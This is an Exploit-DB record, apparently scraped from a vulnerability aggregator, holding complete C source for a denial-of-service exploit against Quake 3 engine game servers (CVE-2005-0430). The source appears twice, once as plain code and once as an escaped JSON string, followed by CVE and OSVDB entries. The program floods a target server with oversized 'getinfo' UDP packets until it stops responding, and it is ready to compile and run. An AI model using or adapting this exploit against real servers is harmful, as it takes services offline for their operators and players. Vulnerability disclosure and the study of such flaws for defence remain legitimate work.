Quake 3 Engine Infostring Crash and Shutdown Exploit
2005-02-12T00:00:00
ID EDB-ID:813 Type exploitdb Reporter Luigi Auriemma Modified 2005-02-12T00:00:00
Description
Quake 3 Engine Infostring Crash and Shutdown Exploit. CVE-2005-0430. Dos exploit for windows platform
/*
by Luigi Auriemma
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#ifdef WIN32
#include <winsock.h>
/*
Header file used for manage errors in Windows
It support socket and errno too
(this header replace the previous sock_errX.h)
*/
#include <string.h>
#include <errno.h>
void std_err(void) {
char *error;
switch(WSAGetLastError()) {
case 10004: error = "Interrupted system call"; break;
case 10009: error = "Bad file number"; break;
case 10013: error = "Permission denied"; break;
case 10014: error = "Bad address"; break;
case 10022: error = "Invalid argument (not bind)"; break;
case 10024: error = "Too many open files"; break;
case 10035: error = "Operation would block"; break;
case 10036: error = "Operation now in progress"; break;
case 10037: error = "Operation already in progress"; break;
case 10038: error = "Socket operation on non-socket"; break;
case 10039: error = "Destination address required"; break;
case 10040: error = "Message too long"; break;
case 10041: error = "Protocol wrong type for socket"; break;
case 10042: error = "Bad protocol option"; break;
case 10043: error = "Protocol not supported"; break;
case 10044: error = "Socket type not supported"; break;
case 10045: error = "Operation not supported on socket"; break;
case 10046: error = "Protocol family not supported"; break;
case 10047: error = "Address family not supported by protocol family"; break;
case 10048: error = "Address already in use"; break;
case 10049: error = "Can't assign requested address"; break;
case 10050: error = "Network is down"; break;
case 10051: error = "Network is unreachable"; break;
case 10052: error = "Net dropped connection or reset"; break;
case 10053: error = "Software caused connection abort"; break;
case 10054: error = "Connection reset by peer"; break;
case 10055: error = "No buffer space available"; break;
case 10056: error = "Socket is already connected"; break;
case 10057: error = "Socket is not connected"; break;
case 10058: error = "Can't send after socket shutdown"; break;
case 10059: error = "Too many references, can't splice"; break;
case 10060: error = "Connection timed out"; break;
case 10061: error = "Connection refused"; break;
case 10062: error = "Too many levels of symbolic links"; break;
case 10063: error = "File name too long"; break;
case 10064: error = "Host is down"; break;
case 10065: error = "No Route to Host"; break;
case 10066: error = "Directory not empty"; break;
case 10067: error = "Too many processes"; break;
case 10068: error = "Too many users"; break;
case 10069: error = "Disc Quota Exceeded"; break;
case 10070: error = "Stale NFS file handle"; break;
case 10091: error = "Network SubSystem is unavailable"; break;
case 10092: error = "WINSOCK DLL Version out of range"; break;
case 10093: error = "Successful WSASTARTUP not yet performed"; break;
case 10071: error = "Too many levels of remote in path"; break;
case 11001: error = "Host not found"; break;
case 11002: error = "Non-Authoritative Host not found"; break;
case 11003: error = "Non-Recoverable errors: FORMERR, REFUSED, NOTIMP"; break;
case 11004: error = "Valid name, no data record of requested type"; break;
default: error = strerror(errno); break;
}
fprintf(stderr, "\nError: %s\n", error);
exit(1);
}
/* Added above winerr.h /str0ke ! milw0rm.com*/
#define close closesocket
#else
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <netdb.h>
#endif
#define VER "0.1"
#define BUFFSZ 2048
#define TIMEOUT 3
#define INFO "\xff\xff\xff\xff" "getstatus\n"
#define GETINFO "\xff\xff\xff\xff" "getinfo "
#define GETINFOSZ (sizeof(GETINFO) - 1)
#define SEND(x,y) if(sendto(sd, x, y, 0, (struct sockaddr *)&peer, sizeof(peer)) \
< 0) std_err();
#define RECV len = recvfrom(sd, buff, BUFFSZ, 0, NULL, NULL); \
if(len < 0) std_err();
#define RECVT if(timeout(sd) < 0) { \
fputs("\nError: socket timeout, no reply received\n\n", stdout); \
exit(1); \
} \
RECV;
void showinfo(u_char *data);
int timeout(int sock);
u_long resolv(char *host);
void std_err(void);
int main(int argc, char *argv[]) {
struct sockaddr_in peer;
int sd,
i,
len,
slen,
from = 700,
to = BUFFSZ - GETINFOSZ,
jumps = 1,
sent = 0;
u_short port;
u_char bof[BUFFSZ + 1],
buff[BUFFSZ + 1],
*p;
setbuf(stdout, NULL);
fputs("\n"
"Quake 3 engine infostring crash/shutdown scanner "VER"\n"
"by Luigi Auriemma\n"
"e-mail: aluigi@altervista.org\n"
"web: http://aluigi.altervista.org\n"
"\n", stdout);
if(argc < 3) {
printf("\n"
"Usage: %s [options] <server> <port>\n"
"\n"
"Options:\n"
"-f FROM start the scan from byte FROM (default %d)\n"
"-t TO finish the scan at byte TO (default %d)\n"
"-j JUMPS the number of bytes to increment for each scan.\n"
" Default value is %d, meaning that if the scan starts from %d it will\n"
" send getinfo followed by %d bytes, then %d, %d, %d and so on until %d\n"
"\n", argv[0],
from,
to,
jumps, from,
from, from + jumps, from + (jumps * 2), from + (jumps * 3), to);
exit(1);
}
#ifdef WIN32
WSADATA wsadata;
WSAStartup(MAKEWORD(1,0), &wsadata);
#endif
argc -= 2;
for(i = 1; i < argc; i++) {
switch(argv[i][1]) {
case 'f': from = atoi(argv[++i]); break;
case 't': to = atoi(argv[++i]); break;
case 'j': jumps = atoi(argv[++i]); break;
default: {
printf("\nError: wrong command-line argument (%s)\n\n", argv[i]);
exit(1);
}
}
}
port = atoi(argv[argc + 1]);
peer.sin_addr.s_addr = resolv(argv[argc]);
peer.sin_port = htons(port);
peer.sin_family = AF_INET;
printf("- target %s : %hu\n",
inet_ntoa(peer.sin_addr), port);
sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
if(sd < 0) std_err();
fputs("- request informations:\n", stdout);
SEND(INFO, sizeof(INFO) - 1);
RECVT;
buff[len] = 0x00;
showinfo(buff);
fputs("- getinfo crash/shutdown scan:\n\n", stdout);
memcpy(bof, GETINFO, GETINFOSZ);
p = bof + GETINFOSZ;
if(from > to) from = to;
for(i = 0; i < from; i++) *p++ = 'a';
slen = p - bof;
for(;;) {
printf(" packet length: %d\r", slen);
SEND(bof, slen);
sent++;
if(timeout(sd) < 0) break;
RECV;
slen += jumps;
if((slen - GETINFOSZ) > to) {
slen -= jumps;
break;
} else if(slen > BUFFSZ) {
printf("\n\n- max local buffer size (%d) reached", BUFFSZ);
slen -= jumps;
break;
}
for(i = 0; i < jumps; i++) *p++ = 'a';
}
if(!sent) {
fputs("\n\nError: recheck your options because I have sent no packets, probably you have chosen too big values\n\n", stdout);
close(sd);
exit(1);
}
printf("\n\n- last UDP packet sent was %d bytes (jumps = %d)",
slen, slen - GETINFOSZ);
fputs("\n- check server:\n", stdout);
SEND(INFO, sizeof(INFO) - 1);
if(timeout(sd) < 0) {
fputs("\nServer IS vulnerable!!!\n\n", stdout);
} else {
fputs("\nServer doesn't seem vulnerable\n\n", stdout);
}
close(sd);
return(0);
}
void showinfo(u_char *data) {
int nt = 1;
u_char *p;
while((p = strchr(data, '\\'))) {
*p = 0x00;
if(!nt) {
printf("%30s: ", data);
nt++;
} else {
printf("%s\n", data);
nt = 0;
}
data = p + 1;
}
printf("%s\n", data);
}
int timeout(int sock) {
struct timeval tout;
fd_set fd_read;
int err;
tout.tv_sec = TIMEOUT;
tout.tv_usec = 0;
FD_ZERO(&fd_read);
FD_SET(sock, &fd_read);
err = select(sock + 1, &fd_read, NULL, NULL, &tout);
if(err < 0) std_err();
if(!err) return(-1);
return(0);
}
u_long resolv(char *host) {
struct hostent *hp;
u_long host_ip;
host_ip = inet_addr(host);
if(host_ip == INADDR_NONE) {
hp = gethostbyname(host);
if(!hp) {
printf("\nError: Unable to resolv hostname (%s)\n", host);
exit(1);
} else host_ip = *(u_long *)hp->h_addr;
}
return(host_ip);
}
#ifndef WIN32
void std_err(void) {
perror("\nError");
exit(1);
}
#endif
// milw0rm.com [2005-02-12]
{"hash": "ad300d0d9228bbe8c3d4cf343fe25964b65cbcf8e198b0562af7ae07e559844f", "id": "EDB-ID:813", "lastseen": "2016-01-31T12:55:28", "enchantments": {"score": {"value": 5.0, "vector": "NONE"}, "vulnersScore": 5.0}, "bulletinFamily": "exploit", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "edition": 1, "history": [], "type": "exploitdb", "sourceHref": "https://www.exploit-db.com/download/813/", "description": "Quake 3 Engine Infostring Crash and Shutdown Exploit. CVE-2005-0430. Dos exploit for windows platform", "title": "Quake 3 Engine Infostring Crash and Shutdown Exploit", "sourceData": "/*\r\n\r\nby Luigi Auriemma\r\n\r\n*/\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n\r\n#ifdef WIN32\r\n #include <winsock.h>\r\n/*\r\n Header file used for manage errors in Windows\r\n It support socket and errno too\r\n (this header replace the previous sock_errX.h)\r\n*/\r\n\r\n#include <string.h>\r\n#include <errno.h>\r\n\r\n\r\n\r\nvoid std_err(void) {\r\n char *error;\r\n\r\n switch(WSAGetLastError()) {\r\n case 10004: error = \"Interrupted system call\"; break;\r\n case 10009: error = \"Bad file number\"; break;\r\n case 10013: error = \"Permission denied\"; break;\r\n case 10014: error = \"Bad address\"; break;\r\n case 10022: error = \"Invalid argument (not bind)\"; break;\r\n case 10024: error = \"Too many open files\"; break;\r\n case 10035: error = \"Operation would block\"; break;\r\n case 10036: error = \"Operation now in progress\"; break;\r\n case 10037: error = \"Operation already in progress\"; break;\r\n case 10038: error = \"Socket operation on non-socket\"; break;\r\n case 10039: error = \"Destination address required\"; break;\r\n case 10040: error = \"Message too long\"; break;\r\n case 10041: error = \"Protocol wrong type for socket\"; break;\r\n case 10042: error = \"Bad protocol option\"; break;\r\n case 10043: error = \"Protocol not supported\"; break;\r\n case 10044: error = \"Socket type not supported\"; break;\r\n case 10045: error = \"Operation not supported on socket\"; break;\r\n case 10046: error = \"Protocol family not supported\"; break;\r\n case 10047: error = \"Address family not supported by protocol family\"; break;\r\n case 10048: error = \"Address already in use\"; break;\r\n case 10049: error = \"Can't assign requested address\"; break;\r\n case 10050: error = \"Network is down\"; break;\r\n case 10051: error = \"Network is unreachable\"; break;\r\n case 10052: error = \"Net dropped connection or reset\"; break;\r\n case 10053: error = \"Software caused connection abort\"; break;\r\n case 10054: error = \"Connection reset by peer\"; break;\r\n case 10055: error = \"No buffer space available\"; break;\r\n case 10056: error = \"Socket is already connected\"; break;\r\n case 10057: error = \"Socket is not connected\"; break;\r\n case 10058: error = \"Can't send after socket shutdown\"; break;\r\n case 10059: error = \"Too many references, can't splice\"; break;\r\n case 10060: error = \"Connection timed out\"; break;\r\n case 10061: error = \"Connection refused\"; break;\r\n case 10062: error = \"Too many levels of symbolic links\"; break;\r\n case 10063: error = \"File name too long\"; break;\r\n case 10064: error = \"Host is down\"; break;\r\n case 10065: error = \"No Route to Host\"; break;\r\n case 10066: error = \"Directory not empty\"; break;\r\n case 10067: error = \"Too many processes\"; break;\r\n case 10068: error = \"Too many users\"; break;\r\n case 10069: error = \"Disc Quota Exceeded\"; break;\r\n case 10070: error = \"Stale NFS file handle\"; break;\r\n case 10091: error = \"Network SubSystem is unavailable\"; break;\r\n case 10092: error = \"WINSOCK DLL Version out of range\"; break;\r\n case 10093: error = \"Successful WSASTARTUP not yet performed\"; break;\r\n case 10071: error = \"Too many levels of remote in path\"; break;\r\n case 11001: error = \"Host not found\"; break;\r\n case 11002: error = \"Non-Authoritative Host not found\"; break;\r\n case 11003: error = \"Non-Recoverable errors: FORMERR, REFUSED, NOTIMP\"; break;\r\n case 11004: error = \"Valid name, no data record of requested type\"; break;\r\n default: error = strerror(errno); break;\r\n }\r\n fprintf(stderr, \"\\nError: %s\\n\", error);\r\n exit(1);\r\n}\r\n\r\n/* Added above winerr.h /str0ke ! milw0rm.com*/\r\n #define close closesocket\r\n#else\r\n #include <unistd.h>\r\n #include <sys/socket.h>\r\n #include <sys/types.h>\r\n #include <arpa/inet.h>\r\n #include <netinet/in.h>\r\n #include <netdb.h>\r\n#endif\r\n\r\n\r\n\r\n#define VER \"0.1\"\r\n#define BUFFSZ 2048\r\n#define TIMEOUT 3\r\n#define INFO \"\\xff\\xff\\xff\\xff\" \"getstatus\\n\"\r\n#define GETINFO \"\\xff\\xff\\xff\\xff\" \"getinfo \"\r\n#define GETINFOSZ (sizeof(GETINFO) - 1)\r\n\r\n#define SEND(x,y) if(sendto(sd, x, y, 0, (struct sockaddr *)&peer, sizeof(peer)) \\\r\n < 0) std_err();\r\n#define RECV len = recvfrom(sd, buff, BUFFSZ, 0, NULL, NULL); \\\r\n if(len < 0) std_err();\r\n#define RECVT if(timeout(sd) < 0) { \\\r\n fputs(\"\\nError: socket timeout, no reply received\\n\\n\", stdout); \\\r\n exit(1); \\\r\n } \\\r\n RECV;\r\n\r\n\r\n\r\nvoid showinfo(u_char *data);\r\nint timeout(int sock);\r\nu_long resolv(char *host);\r\nvoid std_err(void);\r\n\r\n\r\n\r\nint main(int argc, char *argv[]) {\r\n struct sockaddr_in peer;\r\n int sd,\r\n i,\r\n len,\r\n slen,\r\n from = 700,\r\n to = BUFFSZ - GETINFOSZ,\r\n jumps = 1,\r\n sent = 0;\r\n u_short port;\r\n u_char bof[BUFFSZ + 1],\r\n buff[BUFFSZ + 1],\r\n *p;\r\n\r\n\r\n setbuf(stdout, NULL);\r\n\r\n fputs(\"\\n\"\r\n \"Quake 3 engine infostring crash/shutdown scanner \"VER\"\\n\"\r\n \"by Luigi Auriemma\\n\"\r\n \"e-mail: aluigi@altervista.org\\n\"\r\n \"web: http://aluigi.altervista.org\\n\"\r\n \"\\n\", stdout);\r\n\r\n if(argc < 3) {\r\n printf(\"\\n\"\r\n \"Usage: %s [options] <server> <port>\\n\"\r\n \"\\n\"\r\n \"Options:\\n\"\r\n \"-f FROM start the scan from byte FROM (default %d)\\n\"\r\n \"-t TO finish the scan at byte TO (default %d)\\n\"\r\n \"-j JUMPS the number of bytes to increment for each scan.\\n\"\r\n \" Default value is %d, meaning that if the scan starts from %d it will\\n\"\r\n \" send getinfo followed by %d bytes, then %d, %d, %d and so on until %d\\n\"\r\n \"\\n\", argv[0],\r\n from,\r\n to,\r\n jumps, from,\r\n from, from + jumps, from + (jumps * 2), from + (jumps * 3), to);\r\n exit(1);\r\n }\r\n\r\n#ifdef WIN32\r\n WSADATA wsadata;\r\n WSAStartup(MAKEWORD(1,0), &wsadata);\r\n#endif\r\n\r\n argc -= 2;\r\n for(i = 1; i < argc; i++) {\r\n switch(argv[i][1]) {\r\n case 'f': from = atoi(argv[++i]); break;\r\n case 't': to = atoi(argv[++i]); break;\r\n case 'j': jumps = atoi(argv[++i]); break;\r\n default: {\r\n printf(\"\\nError: wrong command-line argument (%s)\\n\\n\", argv[i]);\r\n exit(1);\r\n }\r\n }\r\n }\r\n\r\n port = atoi(argv[argc + 1]);\r\n peer.sin_addr.s_addr = resolv(argv[argc]);\r\n peer.sin_port = htons(port);\r\n peer.sin_family = AF_INET;\r\n\r\n printf(\"- target %s : %hu\\n\",\r\n inet_ntoa(peer.sin_addr), port);\r\n\r\n sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);\r\n if(sd < 0) std_err();\r\n\r\n fputs(\"- request informations:\\n\", stdout);\r\n SEND(INFO, sizeof(INFO) - 1);\r\n RECVT;\r\n buff[len] = 0x00;\r\n showinfo(buff);\r\n\r\n fputs(\"- getinfo crash/shutdown scan:\\n\\n\", stdout);\r\n memcpy(bof, GETINFO, GETINFOSZ);\r\n p = bof + GETINFOSZ;\r\n\r\n if(from > to) from = to;\r\n for(i = 0; i < from; i++) *p++ = 'a';\r\n slen = p - bof;\r\n\r\n for(;;) {\r\n printf(\" packet length: %d\\r\", slen);\r\n\r\n SEND(bof, slen);\r\n sent++;\r\n if(timeout(sd) < 0) break;\r\n RECV;\r\n\r\n slen += jumps;\r\n if((slen - GETINFOSZ) > to) {\r\n slen -= jumps;\r\n break;\r\n } else if(slen > BUFFSZ) {\r\n printf(\"\\n\\n- max local buffer size (%d) reached\", BUFFSZ);\r\n slen -= jumps;\r\n break;\r\n }\r\n for(i = 0; i < jumps; i++) *p++ = 'a';\r\n }\r\n\r\n if(!sent) {\r\n fputs(\"\\n\\nError: recheck your options because I have sent no packets, probably you have chosen too big values\\n\\n\", stdout);\r\n close(sd);\r\n exit(1);\r\n }\r\n\r\n printf(\"\\n\\n- last UDP packet sent was %d bytes (jumps = %d)\",\r\n slen, slen - GETINFOSZ);\r\n\r\n fputs(\"\\n- check server:\\n\", stdout);\r\n SEND(INFO, sizeof(INFO) - 1);\r\n if(timeout(sd) < 0) {\r\n fputs(\"\\nServer IS vulnerable!!!\\n\\n\", stdout);\r\n } else {\r\n fputs(\"\\nServer doesn't seem vulnerable\\n\\n\", stdout);\r\n }\r\n close(sd);\r\n return(0);\r\n}\r\n\r\n\r\n\r\nvoid showinfo(u_char *data) {\r\n int nt = 1;\r\n u_char *p;\r\n\r\n while((p = strchr(data, '\\\\'))) {\r\n *p = 0x00;\r\n if(!nt) {\r\n printf(\"%30s: \", data);\r\n nt++;\r\n } else {\r\n printf(\"%s\\n\", data);\r\n nt = 0;\r\n }\r\n data = p + 1;\r\n }\r\n printf(\"%s\\n\", data);\r\n}\r\n\r\n\r\n\r\nint timeout(int sock) {\r\n struct timeval tout;\r\n fd_set fd_read;\r\n int err;\r\n\r\n tout.tv_sec = TIMEOUT;\r\n tout.tv_usec = 0;\r\n FD_ZERO(&fd_read);\r\n FD_SET(sock, &fd_read);\r\n err = select(sock + 1, &fd_read, NULL, NULL, &tout);\r\n if(err < 0) std_err();\r\n if(!err) return(-1);\r\n return(0);\r\n}\r\n\r\n\r\n\r\nu_long resolv(char *host) {\r\n struct hostent *hp;\r\n u_long host_ip;\r\n\r\n host_ip = inet_addr(host);\r\n if(host_ip == INADDR_NONE) {\r\n hp = gethostbyname(host);\r\n if(!hp) {\r\n printf(\"\\nError: Unable to resolv hostname (%s)\\n\", host);\r\n exit(1);\r\n } else host_ip = *(u_long *)hp->h_addr;\r\n }\r\n return(host_ip);\r\n}\r\n\r\n\r\n\r\n#ifndef WIN32\r\n void std_err(void) {\r\n perror(\"\\nError\");\r\n exit(1);\r\n }\r\n#endif\n\n// milw0rm.com [2005-02-12]\n", "objectVersion": "1.0", "cvelist": ["CVE-2005-0430"], "published": "2005-02-12T00:00:00", "osvdbidlist": ["13771"], "references": [], "reporter": "Luigi Auriemma", "modified": "2005-02-12T00:00:00", "href": "https://www.exploit-db.com/exploits/813/", "viewCount": 1}
{"cve": [{"lastseen": "2017-04-18T15:50:54", "references": ["http://marc.info/?l=bugtraq&m=110824822224025&w=2", "http://www.securityfocus.com/bid/12534", "http://aluigi.altervista.org/adv/q3infoboom-adv.txt"], "description": "The Quake 3 engine, as used in multiple game packages, allows remote attackers to cause a denial of service (shutdown game server) and possibly crash the server via a long infostring, possibly triggering a buffer overflow.", "edition": 2, "reporter": "NVD", "published": "2005-02-12T00:00:00", "title": "CVE-2005-0430", "type": "cve", "enchantments": {"score": {"modified": "2017-04-18T15:50:54", "vector": "NONE", "value": 5.0}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2005-0430"], "scanner": [], "modified": "2016-10-17T23:11:37", "cpe": ["cpe:/a:id_software:quake_3_engine"], "id": "CVE-2005-0430", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0430", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:09", "references": [], "edition": 1, "description": "# No description provided by the source\n\n## References:\nVendor URL: http://www.idsoftware.com\n[Secunia Advisory ID:14273](https://secuniaresearch.flexerasoftware.com/advisories/14273/)\nOther Advisory URL: http://aluigi.altervista.org/adv/q3infoboom-adv.txt\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2005-02/0215.html\n[CVE-2005-0430](https://vulners.com/cve/CVE-2005-0430)\n", "reporter": "OSVDB", "published": "2005-02-12T08:53:55", "title": "Quake 3 Engine Query Handling Overflow DoS", "type": "osvdb", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2005-0430"], "modified": "2005-02-12T08:53:55", "href": "https://vulners.com/osvdb/OSVDB:13771", "id": "OSVDB:13771", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:04", "references": [], "edition": 1, "description": "## Vulnerability Description\nCall of Duty contains a flaw that may allow a remote denial of service. The issue is triggered when a query or a reply containing over 1024 chars is sent to the Call of Duty client or server, which triggers the anti-buffer overflow code, and will result in loss of availability for the client/server.\n## Solution Description\nCurrently, there are no known workarounds or upgrades to correct this issue. However, icculus has released a patch to address this vulnerability for the Linux and Luigi Auriemma has released a patch to address this vulnerability for the Windows version.\n## Short Description\nCall of Duty contains a flaw that may allow a remote denial of service. The issue is triggered when a query or a reply containing over 1024 chars is sent to the Call of Duty client or server, which triggers the anti-buffer overflow code, and will result in loss of availability for the client/server.\n## References:\nVendor URL: http://www.callofduty.com\nVendor URL: http://www.infinityward.com/\nSecurity Tracker: 1011165\nOther Solution URL: http://aluigi.altervista.org/patches/cod-14-fix.zip\nOther Solution URL: http://www.icculus.org/betas/cod/\nOther Solution URL: http://aluigi.altervista.org/patches/coduo-141-fix.zip\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2004-09/0176.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2004-09/0236.html\nGeneric Exploit URL: http://aluigi.altervista.org/poc/codboom.zip\n[CVE-2005-0430](https://vulners.com/cve/CVE-2005-0430)\n", "reporter": "Luigi Auriemma(aluigi@altervista.org)", "published": "2004-09-05T20:02:05", "title": "Call of Duty Anti-Buffer-Overflow Protection Large Input DoS", "type": "osvdb", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "affectedSoftware": [{"name": "Call of Duty", "version": "1.4", "operator": "eq"}], "bulletinFamily": "software", "cvelist": ["CVE-2005-0430"], "modified": "2004-09-05T20:02:05", "id": "OSVDB:9703", "href": "https://vulners.com/osvdb/OSVDB:9703", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}]}
